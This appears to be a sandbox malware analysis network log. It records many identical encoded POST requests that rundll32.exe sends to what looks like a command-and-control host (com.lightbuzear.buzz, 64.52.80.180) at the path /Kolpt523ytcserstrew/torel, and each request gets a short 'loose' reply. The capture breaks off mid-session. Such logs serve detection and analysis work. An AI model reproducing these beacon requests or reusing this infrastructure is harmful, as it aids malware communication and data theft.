              2022-08-14 06:39:27 UTC3INData Raw: 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b
              Data Ascii: ges/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{back


              Session IDSource IPSource PortDestination IPDestination PortProcess
              10192.168.2.224918264.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:36 UTC18OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:39:36 UTC18OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:39:37 UTC19INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:39:36 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:39:37 UTC19INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              100192.168.2.224927264.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:41:15 UTC166OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:41:15 UTC166OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:41:16 UTC167INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:41:16 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:41:16 UTC168INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              101192.168.2.224927364.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:41:16 UTC168OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:41:16 UTC168OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:41:17 UTC169INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:41:17 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:41:17 UTC169INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              102192.168.2.224927464.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:41:17 UTC169OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:41:17 UTC170OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:41:18 UTC171INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:41:18 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:41:18 UTC171INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              103192.168.2.224927564.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:41:19 UTC171OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:41:19 UTC171OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:41:19 UTC172INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:41:19 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:41:19 UTC172INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              104192.168.2.224927664.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:41:20 UTC172OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:41:20 UTC173OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:41:20 UTC174INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:41:20 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:41:20 UTC174INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              105192.168.2.224927764.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:41:21 UTC174OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:41:21 UTC174OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:41:21 UTC176INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:41:21 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:41:21 UTC176INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              106192.168.2.224927864.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:41:22 UTC176OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:41:22 UTC176OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:41:23 UTC177INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:41:22 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:41:23 UTC177INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              107192.168.2.224927964.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:41:23 UTC177OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:41:23 UTC178OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:41:24 UTC179INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:41:23 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:41:24 UTC179INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              11192.168.2.224918364.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:37 UTC19OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:39:37 UTC20OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:39:38 UTC21INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:39:37 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:39:38 UTC21INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              12192.168.2.224918464.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:38 UTC21OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
